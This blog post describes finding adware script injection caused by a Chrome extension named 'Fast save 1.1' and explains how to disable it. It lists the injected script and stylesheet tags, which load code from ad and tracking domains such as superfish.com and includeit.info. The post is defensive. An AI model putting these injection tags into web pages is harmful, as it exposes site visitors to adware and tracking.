Categories
Virus

What is Fast save 1.1?

I noticed one day while viewing my website in Google Chrome that a script from the following domain was being loaded and was taking a very long time:

srv1.mediads.info

I thought this was a bit strange, so I investigated further since I don’t remember referencing that domain in any of my code. I looked at the source code (Right Mouse Click -> View page source) of the webpage and couldn’t see any reference to srv1.mediads.info. So I decided to look at the Google Chrome debugger tool. In Chrome, while still viewing the same website in question, I pressed F12 and there it was. There were a few other scripts I didn’t recognize as well.

Chrome Debugger
Chrome Debugger

In fact, the following scripts were loaded dynamically upon accessing the website:

<script type="text/javascript" src="http://include-it.net/?p=119"></script>

<script type="text/javascript" src="http://srv1.mediads.info/i/?tid=23&amp;subid=2017"></script>

<script type="text/javascript" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&amp;userId=4fc9a7ce0ea27582051112&amp;CTID=p2017"></script>

<script type="text/javascript" src="http://www.superfish.com/ws/js/base_single_icon.js?ver=12.0.1.6"></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/dojo/1.5.1/dojo/dojo.xd.js"></script>

<script type="text/javascript" src="http://includeit.info/include.js?id=js29"></script>

<script type="text/javascript" src="http://www.superfish.com/ws/getSupportedSitesJSON.action?ver=5.6&amp;callback=SF_isURISupported" id="sufioIoScript1" charset="utf-8"></script>

<script type="text/javascript" src="http://www.superfish.com/ws/rvwl.action?ver=3&amp;callback=SF_isRvURISupported" id="sufioIoScript2" charset="utf-8"></script>

<script type="text/javascript" src="http://www.superfish.com/ws/getCouponsSupportedSites.action?ver=15&amp;callback=SF_cpnWlCb" id="sufioIoScript3" charset="utf-8"></script>

<script type="text/javascript" src="http://includeit.info/scripts/inl_dmmtch2.min.js"></script>

<link type="text/css" rel="stylesheet" href="http://static.cpchero.biz/style.css" media="screen">

<script type="text/javascript" src="http://xml.cpchero.biz/search?query=web-backlinks.com&amp;feed=3624&amp;subid=dommatch&amp;url=http%3A%2F%2Fweb-backlinks.com%2F&amp;user_ip=caller&amp;ua=caller&amp;count=10&amp;format=json&amp;callback=RXYO_Interstitial.DoInterstitial"></script>

Upon further investigation, I found out that it was caused by a Google Chrome extenstion called Fast save 1.1. What is Fast save 1.1? I don’t know what it is, but as far as I’m concerned, it’s a malicious code that needs to be removed immediately. Any piece of code that causes the CPU on your laptop to max out, and cause your browser to be unresponsive is malicious. Any piece of code that dynamically injects scripts into every website that you visit is malicious.

Get rid of Fast save 1.1 extension immediately from your Google Chrome browser by going to Settings (Wrench on the right hand side), Tools, Extensions, then untick Enable next to Fast save 1.1.

Fast Save 1.1
Fast Save 1.1